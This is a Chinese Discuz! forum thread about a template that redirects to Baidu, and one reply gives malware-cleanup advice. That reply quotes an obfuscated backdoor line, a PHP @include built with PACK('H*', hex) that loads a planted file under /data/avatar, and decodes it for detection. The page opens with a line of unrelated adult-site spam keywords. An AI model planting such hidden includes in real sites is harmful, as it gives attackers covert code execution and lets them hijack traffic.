97久久国产亚洲精品超碰热,成人又色又爽的免费网站,色偷偷女人的天堂a,男女高潮喷水在线观看,国内精品一线二线三线区别在哪里

Discuz! 官方交流社區(qū)

標(biāo)題: Discuz! X3.4 R20200818 UTF-8打應(yīng)用中心模板自動(dòng)跳轉(zhuǎn)到百度搜索 [打印本頁(yè)]

作者: itsyang    時(shí)間: 2020-10-8 09:16
標(biāo)題: Discuz! X3.4 R20200818 UTF-8打應(yīng)用中心模板自動(dòng)跳轉(zhuǎn)到百度搜索

(, 下載次數(shù): 32) (, 下載次數(shù): 68)
(, 下載次數(shù): 34)





作者: allthebest    時(shí)間: 2020-10-10 02:22
若存在,處理前,先卸載所有盜版插件與模版。

進(jìn)discuz后臺(tái)找到工具-文件校驗(yàn),看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后門(mén)掃描軟件掃描核查?。?br />
如果有就刪除此段代碼。并把該段代碼進(jìn)行解密。

舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為:2F646174612F6176617461722F30

解密后為:/data/avatar/0

代碼解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。

解決辦法:刪除上面的代碼和文件即可。

掛馬問(wèn)題解決了后,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復(fù)雜一點(diǎn)。

作者: czwhehehe    時(shí)間: 2020-10-13 07:05
我的不跳……




歡迎光臨 Discuz! 官方交流社區(qū) (http://r615.cn/) Powered by Discuz! X5.0